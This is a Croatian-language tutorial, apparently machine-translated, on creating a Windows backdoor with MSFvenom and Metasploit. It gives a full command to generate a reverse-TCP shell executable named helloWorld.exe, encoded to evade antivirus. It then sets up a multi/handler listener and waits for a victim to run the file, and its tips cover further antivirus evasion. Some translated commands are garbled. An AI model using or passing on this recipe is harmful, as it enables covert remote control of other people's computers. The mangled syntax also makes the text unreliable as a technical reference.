Stražnja vrata služe za zaobilaženje sigurnosnih mehanizama, često tajno i uglavnom neprimjetno. Koristeći MSFvenom, kombinaciju msfpayload -a i msfencode -a, moguće je stvoriti stražnju vrata koja se povezuju natrag s napadačem pomoću obrnutog TCP -a ljuske. Da biste razvili backdoor, morate promijeniti potpis svog zlonamjernog softvera kako biste izbjegli bilo koji antivirusni softver. Dovršite ovaj projekt na par računala kojima imate dopuštenje za pristup, a pritom ćete naučiti više o računalnoj sigurnosti i kako ova vrsta backdoor -a radi.
Koraci
Korak 1. Pokrenite Kali i pokrenite terminalnu konzolu
Korak 2. Upišite ifconfig za prikaz sučelja i provjerite svoju IP adresu
Korak 3. Upišite msfvenom -l enkodere za prikaz popisa kodera
Kao koder ćete koristiti x86/shikata_ga_nai
Korak 4. Upišite "msfvenom -a x86 -platforma Windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -Windows platforme označava arhitekturu za korištenje.
- -p windows/shell/reverse_tcp označava korisni teret za ugradnju.
- LHOST označava IP adresu slušatelja.
- LPORT označava port slušatelja.
- -b "\ x00" označava izbjegavanje loših znakova (nula bajtova).
- -e x86/shikata_ga_nai označava naziv kodera.
- -f exe> helloWorld.exe označava izlaz formata.
Korak 5. Upišite msfconsole da biste aktivirali Metasploit
Sada ste generirali svoja stražnja vrata. Kada žrtva klikne na helloWorld.exe, ugrađeni korisnički teret ljuske će se aktivirati i uspostaviti vezu s vašim sustavom. Da biste primili vezu, morate otvoriti multi-handler u Metasploitu i postaviti korisni teret
Korak 6. Upišite use exploit/multi/handler
Korak 7. Upišite set payload windows/shell/reverse_tcp
Korak 8. Upišite show options za provjeru modula
Korak 9. Skup tipova LHOST 192.168.48.129
"LHOST" označava IP adresu slušatelja
Korak 10. Upišite niz LPORT 4444
"LPORT" označava port slušatelja
Korak 11. Upišite run i pričekajte vezu s računala žrtve
Korak 12. Pričekajte da žrtva klikne na helloWorld.exe
Tada ćete biti uspješno povezani sa žrtvinim strojem.
Savjeti
- Korištenje -i u MSFvenom -u predstavljat će iteracije kodiranja. Ponekad više ponavljanja može pomoći u izbjegavanju AV softvera.
- Naučili ste kako generirati stražnje vrata i kodirati pomoću MSFvenom -a, ali ova metoda neće savršeno funkcionirati s nekim od AV softvera u današnje vrijeme. Razlog tome su predlošci izvođenja u MSFvenom -u. Prodavači AV -a dodali su statičke potpise ovih predložaka i samo ih traže. Rješenje za ovaj problem je korištenje drugog predloška izvođenja ili različitih alata.